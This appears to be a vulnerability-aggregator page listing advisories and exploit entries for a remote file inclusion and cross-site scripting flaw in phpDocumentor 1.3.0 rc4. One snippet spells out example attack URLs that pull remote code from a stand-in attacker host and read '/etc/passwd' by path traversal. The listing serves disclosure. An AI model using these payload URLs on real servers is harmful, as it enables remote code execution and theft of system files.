CVE-2005-4593

phpDocumentor

CVE-2005-4593

PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary code via a URL in the 1 FORUMLIB parameter in Documentation/tests/bug-559668.php and 2 the rootdir parameter in docbuilder/filedialog.php...

PHPDocumentor Cross-Site Scripting

Advisory 3 Title: PHPDocumentor Cross-Site Scripting Author: 0ozeuso0 Contact: [email protected] Website: olimpusklan.org Date: 30/12/2005 Risk: High Vendor Url: http://www.phpdoc.org/ Affected Software: PHPDocumentor Non Affected: We Are:olimpus klan team TECHNICAL INFO...

phpdocumentor_130rc4_incl_expl.txt

---- PhpDocumentor also, if magicquotesgpc off: http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=http://attacker/script.txt%00 http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=../../../../../../../etc/passwd%00...

phpDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting

source: https://www.securityfocus.com/bid/16101/info phpDocumentor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browse...

phpDocumentor 1.21.3 - Forum Lib Variable Cross-Site Scripting

phpDocumentor 1.21.3 - Forum Lib Variable Cross-Site Scripting source: https://www.securityfocus.com/bid/16101/info phpDocumentor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...

PhpDocumentor <= 1.3.0 rc4 Arbitrary remote/local inclusion

---- PhpDocumentor = 1.3.0 rc4 Arbitrary remote/local inclusion --- software: site: http://www.phpdoc.org/ description: "phpDocumentor, sometimes referred to as phpdoc or phpdocu, is the current standard auto-documentation tool for the php language. Similar to Javadoc, and written in php,...

phpDocumentor 1.3.0 rc4 - Remote Command Execution

phpDocumentor 1.3.0 rc4 - Remote Command Execution PhpDocumentor body background-color:111111; SCROLLBAR-ARROW-COLOR: ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: 1CB081; img background-color: FFFFFF !important input background-color: 303030 !important option backgrou...

phpDocumentor 1.3.0 rc4 - Remote Command Execution

PhpDocumentor body background-color:111111; SCROLLBAR-ARROW-COLOR: ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: 1CB081; img background-color: FFFFFF !important input background-color: 303030 !important option background-color: 303030 !impor...

phpDocumentor <= 1.3.0 rc4 Remote Commands Execution Exploit

Exploit for unknown platform in category web applications ============================================================ phpDocumentor PhpDocumentor body background-color:111111; SCROLLBAR-ARROW-COLOR: ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: cross...

phpDocumentor &lt;= 1.3.0 rc4 Remote Commands Execution Exploit

No description provided by source. ?php ---phpdocu130rc4inclxpl.php 13.06 29/12/2005 PhpDocumentor = 1.3.0 rc4 remote commands execution coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "Confront your soldiers with the deed...